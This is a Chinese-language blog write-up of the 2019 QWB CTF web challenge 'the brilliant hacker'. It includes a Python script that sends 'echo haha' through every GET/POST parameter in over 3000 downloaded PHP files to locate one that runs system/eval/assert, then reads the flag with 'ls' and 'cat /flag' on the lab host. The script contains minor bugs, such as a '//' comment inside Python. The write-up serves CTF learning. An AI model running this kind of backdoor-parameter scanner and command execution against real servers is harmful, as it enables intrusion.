欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

记2019强网杯_web_高明的黑客

程序员文章站 2022-05-16 09:10:48
...

之前参加了2019的强网杯,当时表现很菜,很多题都不会做。
后来发现buuoj.cn上有复现,以此重新复现一下这次的题目。
话不多说,开始今天的主题。

一访问页面就是如下画面:
记2019强网杯_web_高明的黑客因此我们直接访问 url/www.tar.gz即可下载获得源码。
打开压缩包,发现有3000多个php文件。
尝试搜索flag文件,未果。
打开php文件进行代码审计
记2019强网杯_web_高明的黑客发现代码中存在一些诸如这样的get或post参数会执行system()/eval()/assert()函数,意味这我们也许可以通过传递参数的方式来执行cmd命令。
直接在页面构造语句尝试传递参数,页面无法返回正确的输出结果。
由于php文件过多和每个文件的参数过多,因此我们需要搭建一个脚本来进行**,找出行之有效的参数。

博主因为太辣鸡了不会多线程,所以写了一个单线程的脚本,那叫一个慢,跑完怎么也得10分钟把。在此厚颜的贴上自己的代码以供参考。


```python
import os
import requests
import re
import time

def read_file(path, command):  #遍历文件找出所有可用的参数
    with open(path,encoding="utf-8") as file:
        f = file.read()
    params = {}
    pattern = re.compile("(?<=\$_GET\[').*?(?='\])")  #match get
    for name in pattern.findall( f ):
        params[name] = command

    data = {}
    pattern = re.compile("(?<=\$_POST\[').*?(?='\])")  #match get
    for name in pattern.findall( f ):
        data[name] = command
    return params, data

def url_explosion(url, path, command):   #确定有效的php文件
    params, data = read_file(path,command)
    try:
        r = requests.session().post(url, data = data, params = params)
        if r.text.find("haha") != -1 :
            print(url,"\n")
            find_params(url, params, data)         

    except:
        print(url,"异常")
   
def find_params(url, params, data):   #确定最终的有效参数
    try:
        for pa in params.keys():
            temp = {pa:params[pa]}
            r = requests.session().post(url, params = temp)
            if r.text.find("haha") != -1 :
                print(pa)
                os.system("pause")
                
    except:
        print("error!\n")
    try:
        for da in data.items():
            temp = {da:data[da]}
            r = requests.session().post(url, data = temp)
            if r.text.find("haha") != -1 :
                print(da) 
                os.system("pause")
    except:
        print("error!\n")


rootdir = "C:\\src\\"  #php文件存放地址
list = os.listdir(rootdir)
for i in range(0, len(list)):
    path = os.path.join(rootdir ,list[i])
    name = list[i].split('-2')[0]   //获取文件名
    url = "http://8d40e217-717b-4548-a15e-c131a87bdb1d.node3.buuoj.cn/" + name
    url_explosion(url,path,"echo haha")  


最后成功获取url
http://8d40e217-717b-4548-a15e-c131a87bdb1d.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=
通过ls指令找出flag文件存放位置
然后传入 cat /flag 即可获取flag

记2019强网杯_web_高明的黑客
题目圆满完成。
记2019强网杯_web_高明的黑客

相关标签: 强网杯 2019